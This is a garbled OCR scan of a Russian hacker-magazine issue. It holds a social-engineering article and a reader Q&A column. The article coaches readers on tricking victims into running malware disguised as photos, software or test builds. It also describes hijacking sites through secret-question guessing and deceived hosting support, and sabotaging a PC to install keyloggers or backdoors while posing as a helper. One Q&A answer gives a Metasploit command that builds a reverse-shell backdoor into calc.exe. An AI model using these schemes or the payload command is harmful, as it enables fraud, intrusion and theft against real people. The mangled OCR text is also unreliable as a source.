Послетого, какархив скачан, распакован и 
обнаружено, что генератор кодов пополнения 
каким-то чудом оказался генератором паролей 
для брута аськи, извинись и поблагодари ребят. 
Ведьонитебе помогли намного больше, чем 
сами того хотели :). 

Играем на желание бытьзначимым и произ- 
вести впечатление. 

4. Дорожное яблоко. 

Подкидывание накопителей (флеш-карты, диски] 
работает почти безотказно, если сыграть на 
интересе. В зависимости от целевой аудитории, 



Рано или поздно жертва сама попросит тебя выслать 
фотографию, и тут ты, добрая душа, предложишь не 
одну, а целый самораспаковывающиися архив фото- 
графий с расширением .ехе или даже презентацию 
себя в 30а 



1. Полезный софт. 

Отлично идут письма с предложениями 
полезных программ, например, ускоритель 
браузера, позволяющий увеличить ско- 
рость в несколько раз, или крякер паролей 
(«Просто введите адрес сайта, и через не- 
сколько минут Вы получите все пароли!»], 
или про грамма -перехватчик чужих 5М5. 
Удобнее всего отправить письмо со ссыл- 
кой на скачивание, можно от имени друга 
жертвы (узнай предварительно его почту и 
воспользуйся формой для анонимной от- 
правки]. Чтобы повысить уровень доверия, 
можно сопровождать письмо скриншотами 
программы. Играем на любопытность + жад- 
ность. 



2. Сайты знакомств. 

Идеальное место для создания ботнетов, очень 
многие сейчас имеютаккаунты на подобных 
сайтах. Ты тоже обязательно заведи там про- 
файл, знакомься, флиртуй (как показывает прак- 
тика, на женские аккаунты клюют чаще]. Рано 
или поздножертва сама попроситтебя выслать 
фотографию, итутты, добрая душа, предложишь 
не одну, а целый самораспаковывающийся 
архив фотографий с расширением .ехе или 
даже презентацию себя в 30. Предварительно 
заинтригуй настолько, чтобы ему нетерпелось 
поскорее открытьархив, не отвлекаясь на 
ненужные подозрения. Например: послетого, 
какой попросит твое фото, напиши что-то типа 
«Только не удивляйся сильно, я достаточно 



мотивировать кза пуску на компьютере можно 
интригующими названиями: «Зарплата штата со- 
трудников (название конкурирующей компании]», 
«Мой первый лесби-опыт. Видео», «Узнай правду 
о своей жене/девушке» (подкинуть в почтовый 
ящик], «Мой дневник», «Секретная информация», 
«Для Лены. Остальным смотреть запрещается!» 
Играем на любопытство. 

5. Тестирование бета-версии новой 
программы. 

На джоб-сайтах вешаем объявление: «Наби- 
раются люди для тестирования новой програм- 
мы (суть программы]. За каждую найденную 
ошибку — оплата (сумма). Архив с программой 
(12 Мб] и инструкции по почте. О желании 
участвовать втестировании пишите на е-таіі: 
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Разные фишинговые сайты на одном и том же веб-сервере 



Ьеіа-Іезііпдісі***. сот». Желательно, чтобы ящик 
размещался не на бесплатном сервере —так 
солиднее. 

Играем на жадность. 

Взлом сайта 

Для получения доступа к админке сайта необя- 
зательно быть хакером и искать уязвимости в 
коде. Уязвимостей достаточно в головах адми- 
нистраторов ресурса и работников хостинга. 

Их мы сейчас попробуем проэксплуатировать. 
Давай рассмотрим взлом сайта с помощью СИ 
на примере двух реальныхслучаев, разрабо- 
танных и реализованных ведущим проекта по 
социальной инженерии зосіаіѵѵаге.ги . 

ВЗЛОМ САЙТАБНКОиЧІК.ВІІ 

Заходим на ѵѵбоіз-сервис и смотрим имя хостин- 
га и е-таіі, на который зарегистрирован данный 
сайт. После получения е-таіГа идем на ѵапбех. 
Ш.таккакименно наэтом почтовом сервере на- 
ходится почтовый ящикжертвы. И дальше через 
восстановление пароля путем ввода ответа на 
секретный вопрос получаем доступ кящику. 

В нашем случае секретный вопрос оказался 
стандартным — «Любимое блюдо». Подключаем 
фантазию и интуицию, перебираем варианты. 

На шестой раз секретный вопрос «сдался» 



(ответ — даблчизбургер), и е-таіі, к которому 
привязан сайт, у нас в руках. Теперь идем на 
сайт компании, предоставляющей хостингсай- 
ту, и делаем восстановление пароля на почту. 
Вместе с присланным письмом обретаем доступ 
кадминке сайта. 

ВЗЛОМ ФОРУМА НАСКЕВ50РТ.РІІ 

Этот случай посложнее, здесь придется ис- 
пользовать талантубеждения. Убеждать будем 
службу поддержки хосте ра. Итак, выбираем 
сайт-жертву. Идем на сервис ѵѵбоіз, чтобы 
узнатьтам имя хостера (тсбозі.ги) и е-таіі, 
который указан при регистрации. Регистрируем 
е-таіі, сходный с названием сайта: Ьаскегзоіі 
гийтаіі.ги, и просим службу поддержки хостера 
добавить его в регистрационные данные как 
альтернативный, мотивируя это тем, что с про- 
ектом неурядицы, и дополнительный е-таіі 
просто необходим. Естественно, для такого дей- 
ствия нужно подтверждение с основного ящи- 
ка, что и попросил нас сделать саппорт. Никаких 
проблем! Используем для этого форму отправки 
анонимных сообщений: либо онлайн, либо 
качаем программу и заливаем ее на платный 
хостинг. Итак, письмо-подтверждение с фейка 
ящика, указанного при регистрации, отправле- 
но. Но тут оказывается, что этоте-таіінеявля- 




Едвазнакомый парень, 
помогающий тебе починить 
систему — потенциальная угроза 
длятвоего компьютера 
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ется ко нта ктн ы м дл я да н н о го а ккау нта . П р и это м 
СП указывает, что контактный е-таіі находится 
в зоне дтаіі.сот . Мысленно благодарим чело- 
века изсаппортазатакую неосмотрительность и 
идем отправлять очередное фейк-письмоужес 
нужного ящика — Ьаскегзо^.гиѲдппаіІ.сот. Все, 
ящикдобавлен в качестве альтернативного. На 
него дублируются все регистрационные данные. 
Вуаля, доступ к сайту есть. Весь процесс занял 
около часа времени. 

Все видео описанных взломов можноувидеть на 

са йте ЬНрУ/госіаіѵѵаге.ги . 

Утечка информации через 
рабочий стол 

Метод скорее прикладного характера. Атакой 
его считать нельзя — только методом подготовки 
катаке. 



Часто на форумах можно найти темы, где юзеры 
меряются своими десктопами, забывая при 
этом, что рабочий стол — это хранилище ценной 
информации о своем хозяине. Еслиу насесть 
конкретная жертва, информацию о которой нам 
нужно достать — мы просто идем на форумы, где 
этот человек часто бывает и, создав несколько 
аккаунтов, начинаем темутипа «Хвастаемся 
десктопами». Предварительно готовим не- 
сколько вариантов рабочих столов: разные 
обои, наборы программ, браузеры. Желательно 
акцентировать внимание (и продемонстри- 
ровать]ту информацию, которую ты хочешь 
получить отжертвы: например, если это номер 
электронного кошелька, то пусть на снимке 
экрана будет показано окно ѴѴеЬМопеу; если 
антивирус — скриншот должен хорошо высве- 
чивать твой антивирус. Это повышаетшансы, 
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Обычный рабочий стол дает 
очень много информации 
о жертве 

так как часто срабатывает принцип наследо- 
вания: еслиты показываешь предпочитаемую 
прогу (или девайс], обязательно найдутся люди, 
которые захотят похвастаться своим фавори- 
том. Скриншоты можно скачать в интернете или 
создать в графическом редакторе из заготовок 
самостоятельно. 

Что можно узнать по рабочему столу? Как 
минимум — ОС, браузер, антивирус (что может 
пригодиться для дальнейшей атаки), мессен- 
джеры, тип подключения к интернету. Очень 
часто на рабочих столах находится информация 
об имени и фамилии человека, его увлечениях, 
психологическом состоянии на данный момент, 
характере (особенно ярко это демонстрируют 
обои], марку и модель мобильного телефона, 
игры, в которые он играет, и тому подобное. 
Рассмотрим рабочий стол на рисунке «Обычный 
рабочий стол дает очень много информации о 
жертве». Что можно сказать о человеке и его 
компьютере: 

• Скорее всего, он имеет отношение ксфере 
ІТ, программированию (программа Ргее Разсаі 
ЮЕ); файл ФАПП-108 (Факультетавтоматизации 
производственных процессов); 

• Он интроверт, мотивирован в своей деятель- 
ности познанием, а не общением: в дневное 
время незапущен ни один мессенджер (01 Р, 
ѴТаІкіпд], зато открыт ІСЕ Воок Пеабег; 

• Не гонится за новыми веяниями, для него 
важна суть, а не внешняя оболочка: система 
ѴѴіпбоѵѵзХР (а сейчас конец весны 2010 года], 
обои дефолтные; 

• Множество программ по работе сзаписью на 
диски (Аісобоі, ОѴО Оесгуріег, Сіопе БУБ, Ыего] 

+ Мебіа Собегдля конвертирования видео; 

• Путешествия занимаютне последнее место в 
его жизни (файлы: дорога. бос, менгон.бос, про- 
грамма «Редактор маршрутов»]; 

• Провайдер ѴѴеЬЗіхеат, сотрудничающий со 
справочной системой ДубльГИС. Поскольку 
ѴѴеЬЗігеат работает всего с 1 1 областями, то 
можно сузить круг поиска географического на- 
хождения человека; 

• Браузеры: подефолту — 0 ре га, дополнитель- 
ные — ІЕ, ЕЕ; антивирус — СОМООО I пЕегпеІ 
Эесигку; телефон ІЧокіа. 

Обратная социальная 
инженерия (ОСИ) 

В отличие от прямой СИ, обратная является 
более эффективной, целенаправленной, 
но при этом требует большей подготовки и 
продумывания. Бесспорным плюсом этого 
вида атаки является то, что человек сам об- 
ращается к взломщику за помощью. Он сам 
звонит, сам приглашает, сам вручаетсвои 
логины и пароли, оказывая при этом кредит 
доверия «специалисту». Ведь именно как 
специалиста должна воспринимать тебя по- 
тенциальная жертва. Какправило, стандарт- 
ная ОСИ-атака проводится потакой шаблонной 
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ФИШИНГ И ФАРМИНГ 



Фишинг (рЫзЫпд, от англ. ГізЬіпд — рыбалка, выуживание) — это попытка заманить жерт- 
ву на фейк-сайт, в точности повторяющий оригинальный, где она вводит свои логин и 
пароль. Эти данные получают мошенники, пользуясь ими на свое усмотрение. 

Фарминг (Гагтіпд — занятие сельским хозяйством. Не ищи логику в названии. 
Социнженеры — ребята с юмором, назвали этот вид мошенничества по аналогии с 
фишингом) — с помощью подложного БЫЗ-сервера или модифицированного файла Н05Т5 
происходит перенаправление жертвы по ложному адресу. 



схеме (делаю акцент на слове «шаблонной», 
поскольку каждый случай индивидуален, и в 
схеме могут быть отклонения в пользу успеш- 
ности дела): 

1. Диверсия; 

2. Реклама; 

3. «Помощь». 

То есть ты каким-либо образом создаешь об- 
ратимую проблему на компьютере потенци- 
альной жертвы (диверсия). Она в отчаянии не 
знает, что делать и куда можно обратиться за 
помощью. И тут невзначай появляешься ты, 
демонстрируя свои знания в решении этой 
проблемы (реклама). Жертва слезно умоляет 



флешек, сумным видом садишься за компьютер. 
Если хозяин сам не догадается угостить тебя 
чаем/пивом, твоя задача намекнуть ему :). Пока 
владельца компьютера не будет в комнате — за- 
ймись самыми палевными моментами. В общем, 
дальнейшие действия понятны и зависят от 
конечных целей: либо нахождение конфиден- 
циальныхданных, либоустановка кейлоггера и 
просьба ввести логин-парольс целью проверки 
работы сайта ит.п. 

Одним из сложных моментов ОСИ является тща- 
тельная подготовка катаке. Тебе нужно собрать и 
проанализировать как можно больше данных 
о будущей жертве: ее операционную систему, 



Схему атаки ОСИ можно раз- 
нообразить, например, рекламу 
провести до диверсии, тогда все 
будет выглядеть еще более не- 
принужденно и спонтанно. 



тебя помочь ей в починке любимо го компа, 
и в этот момент ей даже в голову не придет 
мысль, что ее могут обманывать или получать 
доступ кличным данным. Этот факт дает от- 
носительную свободу действий социнженеру. 
Итак, ты приходишь кжертве (или она сама к 
тебе приходит со своим ноутбуком), а дальше 
под видом устранения проблемы действу- 
ешь в зависимости от целей: кейлоггеры, 
бэкдоры, ЬаісЬ/ѴВЗсгірШЗсгірі-сценарии 
— что угодно. И сделать это не так сложно, 
поскольку что конкретноты переписываешь 
с флешки или на флешку, ламер вряд ли 
поймет. 

Например, ты якобы случайно знакомишься с 
будущей жертвой в ІСО, в процессе разговора 
упомянув отом, чтоутебя естьдруг, отличный 
спец в компьютерныхтехнологиях. Дальше под 
видом какой-нибудь фишки для «Вконтакте» или 
архива фотографий впариваешьему программу, 
которая сильно загружает память и тормозит 
работу компьютера. Где искать корни проблемы, 
юзер-жертва не знает. Будет логично, если он 
обратится ктебеза контактами друга-ІТ’шника. 
Если он не вспомнито нем —твоя задача 
аккуратно напомнить, обещая договориться о 
бесплатной помощи. Дальшежертва звонит или 
пишетдругу (то есть, опять тебе). Ты приходишь, 
приносишьссобой много разныхдисков, 



браузер (см. раздел «Анализ рабочего стола»), 
интересы, приблизительный уровень компью- 
терныхзнаний ит.п. 

Как я уже говорила, схему атаки ОСИ можно 
разнообразить, например, рекламу провести 
до диверсии, тогда все будет выглядеть еще 
более непринужденно и спонтанно. Также 
можно форсировать обращение за помощью. 
Пример: ты звонишь жертве домой, пред- 
ставившисьтехспециал истом компании- 
провайдера (заблаговремен но узнаешь 
ее название, возможные характеристики 
оказываемыхуслуг, настройки сети). Сообща- 
ешь отом, что в связи с некоторыми измене- 
ниями необходимо сменить настройки сети, 
просишь открыть нужный раздел, диктуешь 
новые настройки (тем самым сбивая их). После 
введения новых параметров интернет, есте- 
ственно, перестает работать. Для проформы 
перебираешь еще несколько вариантов 
настроек, и ни одна из них не должна спасти 
возникшую ситуацию. Тогда ты говоришь: «Бу- 
детели Вы дома еще втечение 10-15 минут? 
Сейчас подойдет специалист». И тут главное 
сработать оперативно, чтобы жертва, изнывая 
от нетерпения, не позвонила действующему 
провайдеру. Ты приходишь, копаешься в си- 
стеме, устанавливаешь правильные рабочие 
настройки, заодноустанавливая какую-нибудь 



программу для перехвата вводимых данных 
или организации удаленного доступа. После 
этого просишь проверить почту, какой-нибудь 
сайт... В общем, действуешь согласно своим 
целям. Оченьудобното, что даже если жертва 
умна и относительно не ламер, в момент по- 
ломки ее голова будетзанята решением про- 
блемы, а не поиском несоответствий в твоем 
неожиданном появлении. Именно поэтому 
нужно хорошо подготовиться, чтобы провести 
беспроигрышную диверсию. 

Итак, говоря об обратной социальной инже- 
нерии, следует учитывать то, что подготовка 
катаке более сложна, требует продумывания 
и множества запасных вариантов. Но в итоге 
она обеспечивает более высокую результа- 
тивность, и самое главное — жертва в конце 
останется тебе благодарна. А это дает высо- 
кий процент повторного обращения за «помо- 
щью». Особенно выгодно иметь такого друга 
на предприятии: влюбой моментты можешь 
позвонить и поинтересоваться, не возникает 
ли технических проблем, не пытались ли злоу- 
мышленники проникнуть в систему. Другими 
словами, ты контролируешь ситуацию на всех 
этапах. 

Заключение 

В целом, глядя на вышеописанные методы 
работы, можно сказать, что четкой схемы все- 
таки нет. Социальная инженерия — это стиль 
мышления, а не наука. Если выработаешь в 
себе нужные механизмы подхода к ситуа- 
ции, жертве, обстоятельствам, то сможешь 
эффективно использовать для своей выгоды. 
Все это постигается не сразу, а с опытом. На- 
блюдай, пробуй, повторяй уже совершенные 
«подвиги» — и со временем увидишь, что 
уже готовые схемы начнут получаться легче, 
появятся свои собственные уникальные 
идеи. 

Под конец хочу сказать о некоторых установках, 
которые определяютуспешность социального 
инженера: 

1. Человеческий фактортаки работает. Если 
программа ограничена рамками допустимых 
значений, то эксперименты с человеческой 
психикой ограничены только нашим незнанием 
ее процессов. 

2. Избавляйся от комплексов, шаблонов и 
стереотипов мышления. Это поможетэффек- 
тивно использовать и манипулировать чужими 
стереотипами. 

3. Учись общаться свободно и уверенно. Ты не 
сможешьубедить человека, если сам не будешь 
уверен втом, что делаешь и говоришь. Также не- 
плохо будет научиться речевым амортизациям 
(почитай по этой теме книгу «Психологическое 
айкидо» Михаила Литва ка). 

4. Не бойся экспериментировать. Не всегда 
все получается с первого раза. Опыт приходит 
с ошибками и количеством практики. В этом 
плане неудачный опыт ценится даже больше, 
чем успешный. Главное — научись анализи- 
ровать свои ошибки сучетом человеческого 
фактор а. □с 
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0: Во время реверсинга часто нужно подсмот- 
реть, что означает тот или иной параметр, 
передаваемый в АРІ-функцию. За объясне- 
нием обычно обращаюсь в МБРЫ, но это долго и 
неудобно. Можно ли как-то научить ША, чтобы та 
добавляла расширенные комментарии к вход- 
ным параметрам АРІ-функций? 

А: Действительно, запомнить входные парамет- 
ры, а вместе стем еще и возвращаемые значения 
многочисленных АРІ — задача, мягко говоря, 
непосильная. Чтобы упростить себе жизнь, парни 
изгупатісз.сот написали ісіа-тзсіп-скрипт 
(взять можно отсюда : діІбиЬ.соітѴгѵпаппісз/ппзсІп- 
ріидіп-ісіа ). который добавляет исчерпывающую 
информацию из М5РЫ для каждого вызова АРІ- 
функции — это какразто, что нам нужно. Правда, 
сначала придется сконвертировать твоюлокаль- 
но установленную библ потеку М50Ы вХМІ_-файл. 
Сделать это можно с помощью тулзы тзсіп- 
сгаѵѵіег [ дііЬиЬ.сот/^ѵпатісз/тзсІп-сгаѵѵІег ]. 
которая парсит библиотеку М50Ы и генерирует 
ХМІ_- файл, содержащий информацию об АРІ- 
функциях ѴѴіпсІоѵѵз (описание, имена аргументов 
вместе с описанием, возвращаемые значения]. 
Всего на данный момент тзсіп-сгаѵѵіег находит 
33984 (!) функции. Сформировав файл тзсіп.хппі, 
остается только добавить из него информацию 
в ЮВ-файл, который понимает сама ЮА. Для 
этого используем ЮАРуіЬоп и выполняем сего 
помощью скрипт ісіаДтрогіег.ру. 

0: Довольно часто использую Тог для сохранения 
анонимности. Но, как известно, существуют та- 
кие утилиты как55І5Ігір, позволяющие перехва- 
тить мои данные на последнем узле, откуда они 
передаются в Сеть в открытом виде. Можно ли 
как-то себя обезопасить от подобного типа атак? 



А: Обезопасить себя на все 1 00% не получит- 
ся, но кое-какие меры все же предпринять 
можно. В пакетутилиты ТогТиппеІ ( ѵѵѵѵѵѵ. 
ІбоидЬісгіппе.огд/зоІІѵѵагеЛогІиппеІ ) входит 
программа под названием ТогЭсаппег. Она 
особым образом опрашивает все выходные 
ноды, полученные от сервера директорий, 
после чего выводит небольшой отчет, на 
каких узлах был переход с НТТР5 на НТТР: 
Іогзсаппег Ьозі рогі/ > битр.іхі. Далее, если 
внести подозорительные узлы в качестве 
значения параметра ЕхсІисІеІ\ІосІе5, то Тог 
исключит их при построении цепочек нодов. 
Идея хорошая, но недостаток очевиден: ата- 
кующий может появиться внезапно, перехва- 
титьтрафики исчезнуть. Поэтому этот способ 
и не дает 1 00% гарантии. 

О: Хочу проверить БѴѴР-файлы на наличие 
вредоносного кода. Подскажи утилиту, которая 
лучше всего подходит для декомпиляции РІазН- 
файлов. 

А: В Сети есть множество бесплатных утилит 
для декомпиляции РІазЬ-файлов, например 
знаменитые Ріа ге и ОѴѴАЭР'зЗѴѴРІпІгисІег. К 
сожалению, возможности бесплатных утилит не 
всегда идутв ногу со временем, поэтому очень 
многие из них не поддержи в а ют те нововве- 
дения, которые появились в 9 и 10 Ріазб’е, 
АсІіопЭсгіріЗ и фреймворке АбоЬе Ріех. Самой 
же продвинутой утилитой на данный момент яв- 
ляется НРЭѴѴРЭсап ( ѵѵѵѵѵѵ. И р.сот/до/зѵѵізсап ]. 
Это первая и единственная бесплатная 
программа, умеющая работать с АсІіопЭсгірІ 2.0 
и АсІіопЗсгіріЗ.О. Программа умеет не просто 
декомпилировать байкод обратно в исходный 
код — она создана специально для поиска 




уязвимостей во РІазЬ-приложениях. Всего реа- 
лизовано обнаружение более 60 разных уязви- 
мостей, включая раскрытие персональных 
данных, Х55, междоменное повышение при- 
вилегий (сгозз-сіоппаіп ргіѵііеде езсаіаііоп] и 
др. НР ЭѴѴРЭсап примечательна еще итем, что 
подсвечивает найденные в коде уязвимости, 
предоставляет рекомендации и исчерпываю- 
щую информацию по уязвимости, а также может 
экспортировать исходный код для дальнейшего 
анализа в сторонних приложения. 

О: Можно ли как-то перенести закладки из 
Ріге^ох в Орега или СИготе? 

А: Есть та кая замечательная прога как 
Тгапзтиіе (ѵѵѵѵѵѵ.деіігапзтиіе.сот), кото- 
рую можно смело можно назвать стандартом 
де-факто для синхронизации закладок между 
различными браузерами. Фишка в том, что про- 
га поддерживает работу не только с бразуерами 
(Рігеіох, Ооодіе СЬготе, Орега, Іпіегпеі Ехріогег 
и другими], но еще и с онлайн -сервиса ми для 
хранения закладок. Правда, для синхрониза- 
ции с Ооодіе Вооктагкз, Оеіісіоиз и другими 
хранилищами закладок придется приобрести 
платную версию. 

О: Есть много-много кода на .іаѵаЗспрІ с коммен- 
тариями на китайском языке. Задача — удалить 
оттуда все комменты. Написал несколько регу- 
лярок, но некоторые вещи программа все равно 
пропускает. Ау вас есть решение? 

А: В большинстве случаев будет до- 
статочно простого регеспа собе. 
герІасе(/\А*.+?\*ѴІѴѴ.*(?=[\п\г]]/д, "). 

Но, увы, он не сможет обработать следующие 
ситуации: 
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Программировать на РуПіоп теперь можно в Ѵізиаі Зіисііо 



1. ѵаг5Іт= " /* поіа геаісоттепі: */"; 

2. ѵаггедех = /Ѵ*.*/; 

Чтобы удалить абсолютно все комментарии, 
для таких ситуаций придется написать неслож- 
ные обработчики. 

О: При запуске последней версии Васкігаск на 
широкоформатном ноутбуке устанавливается 
неправильное разрешение. Какэто пофиксить? 

А: На моем старом Азиз помогло добавление 
пары строчек в конфигМс/ХІ 1/хіпіі/хіпіІгс: 

хгапсіг -оиДриД НБМІ-2 -оДДхгапсІг 
-оиДриД ѴСА -оДД 
хгапсіг -оиДриД НБМІ-2 -оДД 
хгапсіг -оиДриД ѴСА -оДД 

После этого изображение стало выглядеть 
как надо. 

0: Как банковские трояны определяют, что 
пользователь перешел на нужный им сайт (а 
нужен им, как несложно догадаться, интерфейс 
онлайн-банкинга)? 

А: Если говорить просто, то трояну нужно 
отслеживать, что делает веб-браузер пользо- 
вателя и на какие страницы он переходит. Для 
определения перехода на нужный сайт исполь- 
зуются довольно разнообразные приемы: 

• перехват АРІ-функции (в первую очередь, 
ѴѴіпІпеД АРІ) ; 

• интерфейс ВНО (Вгоѵѵзег Неірег ОЬіесД) — 
ОІ_І_- модуль, разработанный как плагин для 
I пДегпеД Ехріогегдля обеспечения дополни- 
тельной функциональности; 

• мониторинг названия окон (с помощью 
банальной АРІ-функции РіпбѴѴіпбоѵѵ); 

• работа с СОМ (Сотропепі ОЬіесД Мобеі] /СЮЕ 
(ОЬіесД Ыпкіпд апб ЕтЬеббіпд) интерфейсами; 



• разработка вспомогательных плагинов к 
браузерам (Рігебох/СЬготе) ; 

• интерфейс ЬВР (Еауегеб Вегѵісе Ргоѵібег), 
позволяющий пользователю подключать 
собственные РИ-библиотеки для обработки 
вызовов ѴѴіпзоск АРІ. 

Самый банальный вариант: троян от- 
слеживает определенную комбинацию в 
названиях окон (например, «ВирегВап к») и 
таким образом понимает, что пользователь 
перешел на сайт банка, а после этого тупо 
записывает в лог все клики и нажатия на 
клавиатуре. 



0: Можно ли отменить случайно отправленное 
письмо? 

А: В некоторых случаях — да! Уверен, что если 
ты и не пользовался Стаіі.то, по меньшей 
мере, обращал внимание на кнопку ІІпсІо, ко- 
торая доступна в течение некоторого времени 
после отправки письма. Время, втечение ко- 
торого письмо находится во временном буфере 
и физически не отправляется, варьируется от 
5 до 20 секунд и регулируется в настройках. 
Пользователи ОіЖоок, работающие в связке 
с Ехсбапде-сервером также могут отозвать 
письмо, воспользовавшись соответствующим 
пунктом в меню «Другие действия». 

0: Хочу поэкспериментировать с ВРІО. В смысле, 
не собирать считыватель или эмулятор меток 
с нуля, а именно интегрировать его в рамках 
какой-нибудь информационной системы. На- 
пример, повесить ВРЮ-метку на ошейник кошки 
и отслеживать ее перемещения по квартире, 
записывая сііеск-іп в лог-файл. По идеи, ничего 
сложного в этом нет, если есть метки и ПРЮ-счи- 
тыватели. Подскажи, где их достать как можно 
дешевле? 

А:Хороший векторты выбрал для экспериментов, 
молодец! Тем более сейчас как никогда ранее все 
необходимые инструменты стали доступными. 
Покупать НЕЮ-оборудование в России — невы- 
годно. Наши разработки — дорогие, а те, что везут 
с Китая, продаются втридорога. Поэтому самый 
верный способ — заказать все самому где-нибудь 
за рубежом. Если посерфитьтакие сайты, как 
ѵѵѵѵѵѵ.беаіехігете.сопп . где продается миллион 
товаров китайской промышленности, можно 
найти І\ІоІ\Іате считыватели РЕЮ по цене от $40. 
Как правило, в комплекте идет одна-две метки 
для экспериментов. Увы, отвечать за качество 
ка ко го-то ко н кретн о го то ва ра за та кую сто и м ость 
никто не может. А вот что действительно могу по- 



Настраиваем тулзу для поиска потерянного ноутбука 
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Качественный КРШ-считыватель и набор меток за $52 



советовать по своему опыту, так это РЕЮ-модуль 
от известной компании Рагаіах ( ѵѵѵѵѵѵ.рагаЦах. 
сот ], который подключается к компьютеру через 
серийный/ІІ5В порт. Товар можно купить прямо 
на сайте производителя (ищи по ключевым 
словам ВЕЮСагсІ Реасіег] поценеот$39,99за 
штуку. Метки придется покупать отдельно: одна 
ВЕЮ-карточка стоит$0,99. 

О: Украли ноутбук. Дал милиции МАС-адрес, но 
учитывая, что в городе много провайдеров, шанс 
найти ноут по этим данным небольшой. Хочу 
теперь поставить на все свои ноутбуки какую- 
нибудь программу, которая постоянно будет сту- 
чаться на сервер и сливать туда текущую инфу 
(скажем, ІР-адрес). В такой ситуации поймать 
подонков будет куда проще. Но какэто лучше 
всего сделать? 

А: Сам понимаешь, что написать программу, 
которая, скажем, при запуске будет отправлять 
текущий ІР-адрес, ничего не стоит. Но этого 
мало! В нетбуках сейчас есть СРВ — значит, 
можно отправлять и координаты. Пускай такого 
модуля нет, но по параметрам точки доступа 
ѴѴі-Рі (МАС и Е55Ю) зачастую также можно 
определить месторасположение (по крайней 
мере, Соодіе. Карты такое позиционирова- 
ние могутвыполнятьоченьздорово). Если в 
ноутбуке есть камера, то почему бы не сделать 
снимокс камеры и не отправитьего на сервер 
— возможно, повезетувидеть негодяя в лицо. 

В любом случае никто не мешает отправить 
скриншот рабочего стола — туттоже может 
быть важная информация для поиска бука. Не 
нужн о даже н и ч е го кодить в ру ч ну ю , п ото му что 
все эти действия поддерживаются программой 
Ргеу ( ргеѵрго]есЕсот ). Версия утилиты уже есть 
для всехдесктопных платформ: ѴѴіпбоѵѵз, Мае 
и І_іпих, а совсем недавно появилась версия и 
для АпбгоісІ. С определенным интервалом Ргеу 
просыпается в системе и стучит на опреде- 
ленный ИРЕ, чтобы проверить, не появилась 
литам команда на сбор данных. Если режим 
поиска активирован, то она сама будет пытаться 



подключиться к ближайшему ѴѴі-Еі (даже если 
злоумышленникэтого делать не будет]. А изоб- 
ражение с камеры в некоторых случаях будет 
сниматься незаметно, то есть без визуального 
оповещения (обычно рядом с камерой есть 
небольшой светодиод]. 

О: Можно ли кѴізиаІБІисІіо прикрутить подсветку 
синтаксиса РуІНоп? 

А: Можно сделать даже больше. С недавнего 
времени в рамках проектах ІгопРуІбоп (это 
реализация Руібоп для платформы .ІЧеІ:] были 
опубликованы специальные инструменты для 
работы с Руібоп-кодом в ѴізиаІЗіисІіо 2010. 

В результате ты получаешь многие бонусы, 
которые предоставляет ЮЕ от М іеговой, 
для разработки кода на РуОаоп, в том числе 
отладчик (хотя и нетакой мощный какдля С#] и 
знаменитую ІпіеІІіЗепзе — систему подсказок и 
автодополнения команд. 

О: Подскажи самый простой способ открыть 
шелл на удаленной ѴѴіпсіоѵѵз-системе ушастого 
пользователя. 

А: Не буду тут приводить примеры многочис- 
ленных джоинеров, позволяющих присоеди- 
нить к невинному ехе’ш нику зловредный код. 
Можно обойтись и без джоинера, и, собст- 
венно, без самого бэкдора, заменив обоих 
МеіазроіЕом. В одной из последних версий 
появиласьзамечательная команда тзіепсосіе, 
которая присоединяет к произвольному би на р- 
нику одну из боевых нагрузок Меіазріоіі:, втом 
числе ЬасксоппесЕ 

. /шз^рауіоасі міпйомз/текегргекег/ 
геѵегзе_Ьср ЬНОЗТ=<твой ір> К . / 
тзііепсосіе -С ехе -х саіс.ехе -к -о 
са1с_Ъаскс!оог . ехе -е х86/зЪ.ікака_ 
да_паі -с 5 

Если получившийся ехе-файл запустить на 
удаленной системе, то с неетотчаеже поступит 
обратное соединение. 




О: Хочу автоматизировать нудную работу, 
связанную с заполнением данных в Ехсеі-файл 
(*.ХІ_5). Данные необходимо обновлять из 
скрипта, написанного на РуІНоп. Как? 

А: Есть два варианта. Использовать готовые 
модули, например, РѵхІгеасІег( рѵх[геасІег. 
зоигееіюгде.пеі: ]. или же воспользоваться 
технологией СОМ, с помощью которой получать 
данные с Ехсеі напрямую (работать с файлом 
будетсам офисный пакет]. Второй вариант 
более сложен и ктомуже добавляет обязатель- 
ную зависимость скрипта отустановленного в 
системе Ехсеі. 

О: Что нужно знать, чтобы реверсить приложе- 
ния для іРНопе? 

А: Все приложения для іРЬопе имеютсвой 
формат исполняемых файлов — МасЬ-О.При 
этом само приложение распространяется в 
виде ІРА-файла — гір-архива, в котором упа- 
кован сам би на рн и к, а также файлы -ресурсы. 
Для того, чтобы поднять на телефоне условия 
для отладки, необходим девайс, на котором 
установлен ^іІВгаке (то есть должен быть 
рутовый доступ к файловой системе]. После 
этого у тебя будет доступ к отладчикам дбЬ/ 
ірбопесІЬд. Приложения из АррЗіоге закрипто- 
ваны: дешифрование осуществляется загруз- 
чиком МасЬ-О. Защита не слишком сложная, 
куда больше проблем доставляет тот факт, что 
основным языком разработки приложений яв- 
ляется ОЬ]ес1:іѵе-С. Комплируемый объектно- 
ориентированный язык программирования от 
корпорации Арріе построен на основе языка 
Си и парадигм 5таШ:а1к. Последнее означает, 
что всем объектам посылаются сообщения. 

В результате большая часть вызовов (>80%] 
программы выгодят какоЬ]с_т5д8епсІ(]. Пе- 
реварить их без дополнительного помощника 
довольно сложно, однако граф вызовов можно 
серьезно упростить и привести в божеский 
вид с помощью скрипта гупатіез ОЬ]ес1:іѵе-С 
Ьеірег ( аііЬиЬ.сот/гѵпатісз/оЬіс-ЬеІрег- 
ріидіп-ісіа ]. подключаемого к ЮА Рго в виде 
плагина. 

О: Во многие телефоны сейчас встроен модуль 
А-ЗР5 (Аззізіесі 0Р5). Система подгружает из 
инета данные, необходимые для быстрого 
поиска спутника. Получается, что для запуска 
ОРЗ всегда нужен инет? 

А: На самом деле нет, АззізіесІ 6Р5 — это 
лишь система, ускоряющая так называемый 
«холодный старт» 6Р5, то есть процесс перво- 
начального поиска спутника. Часть необходи- 
мых данных, втом числе альманах с текущим 
расположением спутников, подгружается 
в телефон и используется для первичного 
определения координат. Если возможности 
подгрузить данные нет, то С РБ- модуль рабо- 
тает в обычном режиме: как если бы А-0Р5 в 
системе не было. Впрочем, отдельные прием- 
ники с А-СР5 без оператора сотовой связи 
работать все же не могут, но это исключение, а 
не правило. ІЬИ 
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Простой способ запомнить 
пароли 
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'•РА55ѴѴ0Р0САР0 

уѵѵѵѵѵ.ра55\л/огсІсагсІ.огд 

Сделать один надежный пароль (аля Ы 50ЬаІ_) — легко. Но попробуй 
